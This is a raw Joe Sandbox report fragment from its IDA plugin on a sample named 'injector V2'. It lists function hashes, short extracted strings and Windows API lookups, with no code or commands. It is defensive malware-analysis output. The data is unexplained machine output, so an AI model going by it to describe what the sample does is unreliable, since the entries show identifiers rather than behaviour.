                                                                          • Instruction Fuzzy Hash: 87E1A979608600CFD718CF29D890BA677F2FB89315F09897CE94A87B91D338E956CB44
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID: gfff$hi
                                                                          • API String ID: 2994545307-2749480207
                                                                          • Opcode ID: ccd8c4faa15942c8817bfccffa3e7865085b8a849222180f92b212f794360ae0
                                                                          • Instruction ID: 8be27eaea9eb9906321fb2802653f2bd2eacb5c250ed8523c9b8ff0ca300b706
                                                                          • Opcode Fuzzy Hash: ccd8c4faa15942c8817bfccffa3e7865085b8a849222180f92b212f794360ae0
                                                                          • Instruction Fuzzy Hash: C36126726082048BD718CF29DC627ABBBD6FBC5314F49863EE486C77E1DB3894458789
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: m''$VB<2
                                                                          • API String ID: 0-979874221
                                                                          • Opcode ID: 6eef21739b3b22b1a8232fb88dfef1edccd1d52c709e48569075e22fdd8931b8
                                                                          • Instruction ID: c25300c1ca98c31efe76d7136a947c745435c0411e6436b1ff5d90aa4dde673c
                                                                          • Opcode Fuzzy Hash: 6eef21739b3b22b1a8232fb88dfef1edccd1d52c709e48569075e22fdd8931b8
                                                                          • Instruction Fuzzy Hash: 3351FAB0604B918BD72ACF3684607B3FBD29F93204F5888AEC1DB5B393D67955078718
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: m''$VB<2
                                                                          • API String ID: 0-979874221
                                                                          • Opcode ID: d833140be7d569808b37714d485f2a43dc9987be2b027a37305b51ff8c620470
                                                                          • Instruction ID: e3aac50440cca16b9f10dbeab26ad0c50413b8f1dd6135df4be0c5ffa54bc7e6
                                                                          • Opcode Fuzzy Hash: d833140be7d569808b37714d485f2a43dc9987be2b027a37305b51ff8c620470
                                                                          • Instruction Fuzzy Hash: 265148B0204B908AD72A8B3685603B3FBD59F93304F58C9BEC2EB5B293D67D55078718
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: m''$VB<2
                                                                          • API String ID: 0-979874221
                                                                          • Opcode ID: d04434aace0846d698a72d21c04062156debf4dab956015e3ba6f3ac5190d4fa
                                                                          • Instruction ID: 2d46eba3fc5fa31c678c6b6dc440f03a7e9b90812e966142dc490e21991dc472
                                                                          • Opcode Fuzzy Hash: d04434aace0846d698a72d21c04062156debf4dab956015e3ba6f3ac5190d4fa
                                                                          • Instruction Fuzzy Hash: 3941F4B0204B818AD7298B3685607B3FBD69F93204F48C9BEC2EB57292D7795547C728
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID: f
                                                                          • API String ID: 2994545307-1993550816
                                                                          • Opcode ID: a6bc692dde4df61ced0f2e28d5ca6a093fdeabf0f0e8c929eecb3d91f9e4e765
                                                                          • Instruction ID: c21e14afe227371aa15767804557fbf9aa7178d8cb9394231b6b81bc83c30101
                                                                          • Opcode Fuzzy Hash: a6bc692dde4df61ced0f2e28d5ca6a093fdeabf0f0e8c929eecb3d91f9e4e765
                                                                          • Instruction Fuzzy Hash: 5C222475A083408FD714CF29D88072BBBE2FBD9314F18966EE4948B391E7B9D805CB56
                                                                          APIs
                                                                          • CoCreateInstance.OLE32(00445598,00000000,00000001,00445588), ref: 004251B9
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: CreateInstance
                                                                          • String ID:
                                                                          • API String ID: 542301482-0
                                                                          • Opcode ID: f4760c72ca3ab4499f60d35f20d53bc6d1762609ce98902aaf529a34552b005c
                                                                          • Instruction ID: fdecdec864341b043be84211c54955d9156eea7555074436d1808e51303fd77b
                                                                          • Opcode Fuzzy Hash: f4760c72ca3ab4499f60d35f20d53bc6d1762609ce98902aaf529a34552b005c
                                                                          • Instruction Fuzzy Hash: CB61F0B0700610ABDB20DB64EC92BB733B4EF81764F444559E946CB3D1E7B9E801C76A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: mx
                                                                          • API String ID: 0-39301968
                                                                          • Opcode ID: c392a851827f09716eb2e356e4afa61a6d4756358f2c37137f751e010903ddc2
                                                                          • Instruction ID: 68be841936758b77fdd231ccc05c5dfdb74d2b6a17be08b4454c7d3ef45dbec4
                                                                          • Opcode Fuzzy Hash: c392a851827f09716eb2e356e4afa61a6d4756358f2c37137f751e010903ddc2
                                                                          • Instruction Fuzzy Hash: 3ED103B2A042218BDB14CF64D8917ABBBF2FF95304F598059DC856F356D3799C01CB98
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: "
                                                                          • API String ID: 0-123907689
                                                                          • Opcode ID: 5c55e3568b5dab33239933da9159eaf9d7c516b03c83cee6dd5cd0f22fd39608
                                                                          • Instruction ID: 1f59a6d8db6db1c4cd08dfb07f7d58f4dc0d76454265674249241f993d7d03ec
                                                                          • Opcode Fuzzy Hash: 5c55e3568b5dab33239933da9159eaf9d7c516b03c83cee6dd5cd0f22fd39608
                                                                          • Instruction Fuzzy Hash: 0DC116B1F043209BD714DE24E88076BB7E5AB85354F58896FE88587382D738EC45C7D6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: !%
                                                                          • API String ID: 0-2252526427
                                                                          • Opcode ID: dafa25849e885a7a2376d42495e2191cb13b9e5e33c86b7ce31a2e376f9b8279
                                                                          • Instruction ID: 095aa6f468979c2216630c14da54f820b92c33cc7114d8bedaa3e8fb78293240
                                                                          • Opcode Fuzzy Hash: dafa25849e885a7a2376d42495e2191cb13b9e5e33c86b7ce31a2e376f9b8279
                                                                          • Instruction Fuzzy Hash: 7AA1AC329593908AD3308B64E8853EBB7D1EFD5314F188A7CD8C9A7696DE784805C78A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 5W7Q
                                                                          • API String ID: 0-53030636
                                                                          • Opcode ID: 9f2e4376d6d2164d3b310746f4e0db2411941d6abbaa44c84c5f35703fd36502
                                                                          • Instruction ID: e855a70b173633ad297f356944977ed1d776950710832cb632ea12f46a2b7411
                                                                          • Opcode Fuzzy Hash: 9f2e4376d6d2164d3b310746f4e0db2411941d6abbaa44c84c5f35703fd36502
                                                                          • Instruction Fuzzy Hash: 74814EB6E102208BCB14CF55C8D166BB7B2FF95304B1991ADDC95AF399D7788C02CB98
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: D
                                                                          • API String ID: 0-2746444292
                                                                          • Opcode ID: 8fd255488a632667800d66de56ea0c4bcc8044c4de3df099d0d0fd0a960c3e48
                                                                          • Instruction ID: 33d89bed4f40e1afedd7c82201469d326f2f1921df322d6b6b95093ff8c1c081
                                                                          • Opcode Fuzzy Hash: 8fd255488a632667800d66de56ea0c4bcc8044c4de3df099d0d0fd0a960c3e48
                                                                          • Instruction Fuzzy Hash: 80B1EEB04193909BE3208F52D49935BBBF1FB96788F109E1CE4D92B364D7BA8505CF86
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: "
                                                                          • API String ID: 0-123907689
                                                                          • Opcode ID: b691a8731d522bf202b6265a6d52436cd82f5d5e5cdb790585c46ddd39a620c4
                                                                          • Instruction ID: 4d70004d7e0d837102e1f13a81e8686068d22dcf9671673e1cf58eb6a6f45ec2
                                                                          • Opcode Fuzzy Hash: b691a8731d522bf202b6265a6d52436cd82f5d5e5cdb790585c46ddd39a620c4
                                                                          • Instruction Fuzzy Hash: F381E532F083255BD714CE2CE88031FB7E2ABC5754FA9856EE4988B395D27CDC45878A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: *xb
                                                                          • API String ID: 0-3984212304
                                                                          • Opcode ID: ff5c5cd6366510db635e0a402306f76eba85caee897ba55cf23bc06e2ebfbb47
                                                                          • Instruction ID: 138be9bd605a9790fe0bb82ec5fa0e8f8c87b12cbd09c3f84ceb05a172731f23
                                                                          • Opcode Fuzzy Hash: ff5c5cd6366510db635e0a402306f76eba85caee897ba55cf23bc06e2ebfbb47
                                                                          • Instruction Fuzzy Hash: 4B816D71614B808BE325CF35C4613A3BBE29F97304F9888AEC1EB4B356C7786509CB55
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID: 5|iL
                                                                          • API String ID: 2994545307-1880071150
                                                                          • Opcode ID: b7b3a01f2354b3d6e40f82884bdda332427d0e770da483c2d08ac698c4eed33d
                                                                          • Instruction ID: 7dccffd2950b5a73c1c818431a4817c4ae86801f2403333fdf190beceb2d0f45
                                                                          • Opcode Fuzzy Hash: b7b3a01f2354b3d6e40f82884bdda332427d0e770da483c2d08ac698c4eed33d
                                                                          • Instruction Fuzzy Hash: 334146396083015FF720AB65CD40B37B392FB85714F64852EFA81A7361D7B8AC11C789
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: T
                                                                          • API String ID: 0-3187964512
                                                                          • Opcode ID: c32409563b2c7596c104ed382bbe40411a1c4702ea2ee9d655fc10383c8791a7
                                                                          • Instruction ID: 423c329b8857628f80e22b3382421865e9698337571ff4838c1df5a27c93ea85
                                                                          • Opcode Fuzzy Hash: c32409563b2c7596c104ed382bbe40411a1c4702ea2ee9d655fc10383c8791a7
                                                                          • Instruction Fuzzy Hash: 36418D37E193508BD318CB2A886236BBAD26BD2314F1DA55DDCD697380CB79880787C5
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6a2eb969bb77184854266a119fef9c23d35ad771d632edd9288b43ee4e9cea41
                                                                          • Instruction ID: fd60880f87fd5f042bb55b739f04a02bdf19694a3dd7e8ff49931cbfa69ad538
                                                                          • Opcode Fuzzy Hash: 6a2eb969bb77184854266a119fef9c23d35ad771d632edd9288b43ee4e9cea41
                                                                          • Instruction Fuzzy Hash: E442D631A087158BC724DF28D98066BB3E1FFD4314F29893ED986A73C1D738A955CB46
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fe2e899c0803e4fc9294aae4f4cbe4c31a355d6640e0d9ede45e9b2ee3501428
                                                                          • Instruction ID: 9871563faf61de0b379d819352f8f35fa908966f8758bda5512e374c7c6c0e98
                                                                          • Opcode Fuzzy Hash: fe2e899c0803e4fc9294aae4f4cbe4c31a355d6640e0d9ede45e9b2ee3501428
                                                                          • Instruction Fuzzy Hash: CDA1ED729083648BD710DF28E85166FB7E0FFC6704F05892DE9999B381E7B89905CBC6
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b45b0bc232026ea24688bb9944098decd9a341e30798f64f2ff45377abcb9777
                                                                          • Instruction ID: 2edbebac2ba33129d0d2d2745cd6885b78166fd00be14dc4427e9dfbccafce0b
                                                                          • Opcode Fuzzy Hash: b45b0bc232026ea24688bb9944098decd9a341e30798f64f2ff45377abcb9777
                                                                          • Instruction Fuzzy Hash: 6BC139B2A087518FC360CF28C896BABB7E0BF85318F09492DD5DAD7342D738A555CB46
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 1a8add08464980cb2761a476b59e7278314c31f30e5f629eb31c5be43e253d57
                                                                          • Instruction ID: f74e346c37a6439607478d01926bf0713ef6a22ca836b557cf1b053092e6771f
                                                                          • Opcode Fuzzy Hash: 1a8add08464980cb2761a476b59e7278314c31f30e5f629eb31c5be43e253d57
                                                                          • Instruction Fuzzy Hash: A8910235A083219BD725DF28C48096BB3F2FF88B01F19852DE98597361DB75ED11C789
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: cda4046569b3ce76b98fe6973d56f679305696a09388587b84c3cd15af8373db
                                                                          • Instruction ID: 17931cb77829ba3f94da8b4d72962568ccb3d2037b3c877f76e0a64ad7bc85a2
                                                                          • Opcode Fuzzy Hash: cda4046569b3ce76b98fe6973d56f679305696a09388587b84c3cd15af8373db
                                                                          • Instruction Fuzzy Hash: D38157767452119BC7288B28DC5162BB7D2BBD9314F1E893FE48BE7391D2768C028789
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9df3544cdc6688e77c3b4516b687e1db283f7bf3317775ce8e73a2c57993bb9c
                                                                          • Instruction ID: 3edc8fe05abed296fc90330c281933942242c5e4c877e47e5d884f7e3a74bbf1
                                                                          • Opcode Fuzzy Hash: 9df3544cdc6688e77c3b4516b687e1db283f7bf3317775ce8e73a2c57993bb9c
                                                                          • Instruction Fuzzy Hash: 195111745083148BD710EF24EC9166BB3F0FF86309F04896DFA858B392E7B99515CB8A
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e07cf1a0f646272b9961cad698cee4a013d2282455931f9555f41b6ed20b89b4
                                                                          • Instruction ID: 1f26c5e31d1c77a10ea2fc890b697fa0ddb453bf2b94fb93e97bf561998b9954
                                                                          • Opcode Fuzzy Hash: e07cf1a0f646272b9961cad698cee4a013d2282455931f9555f41b6ed20b89b4
                                                                          • Instruction Fuzzy Hash: 7B5168B56047908FE326CB24D9A07B3BBD1EFA7300F1944AED2EB47742C6786805CB59
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b02f44bd946c1f2d02873fd7add9eb3621ba9c3810df1b3d58e1c6e076fefd1c
                                                                          • Instruction ID: f1c84114eb53e5f6dd2c277bfb44aa28e8687856cfae246435dfae2d81435cad
                                                                          • Opcode Fuzzy Hash: b02f44bd946c1f2d02873fd7add9eb3621ba9c3810df1b3d58e1c6e076fefd1c
                                                                          • Instruction Fuzzy Hash: 4721023524C3509BE304CF64E88175FBBE1EBD2708F04893CE0D56B2D1C7B9890A8B86
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                          • Instruction ID: 66d44d8087a3eb04b29204646c0e0e65384397f1bc758f2333f8db79bf2d96e7
                                                                          • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                          • Instruction Fuzzy Hash: 77110673A091D40EC3229D3C844056ABFA30A97634F19539AE4F59B2D2D6268F8A9359
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 93cf4102431860a03011af69eae1a2e8c3aa495d040b5c5cbbf8479e75f13c75
                                                                          • Instruction ID: d00aaa0516ca83e4f86f41f5625c22a84deea6580ae943965f5694fc8de1a1c0
                                                                          • Opcode Fuzzy Hash: 93cf4102431860a03011af69eae1a2e8c3aa495d040b5c5cbbf8479e75f13c75
                                                                          • Instruction Fuzzy Hash: 2A018CF270061147DA20DE15B4C2B2BA2A8AB94708F08443EE84957343DB7AF804D6E9
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c409e37377122d756683e200e61e216973451adc5ae8440ce1c9bedf68858a57
                                                                          • Instruction ID: 30b2b152add473f6c23690d850704e98a4a1e86c7b4ac96a0281fc068ccec786
                                                                          • Opcode Fuzzy Hash: c409e37377122d756683e200e61e216973451adc5ae8440ce1c9bedf68858a57
                                                                          • Instruction Fuzzy Hash: 71F02B3F71D2150BE320EDF698C4A27F3D6E7D5204F068139EA00D3641D5B4E8019194
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 62d8f916eceddfe70b51157f17587468dcc5f53ed5a85db78ddbc5d50c948c2b
                                                                          • Instruction ID: 43d1b569583880d07ef5defd1d52dccbae16a574cd8c2488e16fa8404c3c91ce
                                                                          • Opcode Fuzzy Hash: 62d8f916eceddfe70b51157f17587468dcc5f53ed5a85db78ddbc5d50c948c2b
                                                                          • Instruction Fuzzy Hash: AE014E3422434346E368FB15C865DAEF3B46F59308F50143EA14B561E3DF742D45CA69
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0e1673d524a716431d71ad52375fd1f088b51840c654adb7b019f9f6998683c1
                                                                          • Instruction ID: e216245fcd1f02e8d49cd160d73a7276a2793a54deec6a2f5fd7b1151f32daca
                                                                          • Opcode Fuzzy Hash: 0e1673d524a716431d71ad52375fd1f088b51840c654adb7b019f9f6998683c1
                                                                          • Instruction Fuzzy Hash: D4D05EEAE8500047DB099A20EC43552A2664A9F204B0CF035D902C6746EB3DD41A844D
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00604CB6
                                                                          • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00604CC4
                                                                          • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00604CD5
                                                                          • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00604CE6
                                                                          • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00604CF7
                                                                          • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00604D08
                                                                          • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 00604D19
                                                                          • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00604D2A
                                                                          • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 00604D3B
                                                                          • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00604D4C
                                                                          • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00604D5D
                                                                          • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00604D6E
                                                                          • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00604D7F
                                                                          • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00604D90
                                                                          • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00604DA1
                                                                          • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00604DB2
                                                                          • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00604DC3
                                                                          • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00604DD4
                                                                          • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 00604DE5
                                                                          • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 00604DF6
                                                                          • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 00604E07
                                                                          • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00604E18
                                                                          • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 00604E29
                                                                          • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 00604E3A
                                                                          • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 00604E4B
                                                                          • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00604E5C
                                                                          • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00604E6D
                                                                          • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 00604E7E
                                                                          • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00604E8F
                                                                          • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00604EA0
                                                                          • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 00604EB1
                                                                          • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00604EC2
                                                                          • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 00604ED3
                                                                          • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00604EE4
                                                                          • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 00604EF5
                                                                          • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 00604F06
                                                                          • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 00604F17
                                                                          • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 00604F28
                                                                          • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 00604F39
                                                                          • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 00604F4A
                                                                          • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 00604F5B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1940053989.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000002.00000002.1940023885.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940098407.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940128462.000000000061B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940153408.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940177326.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$HandleModule
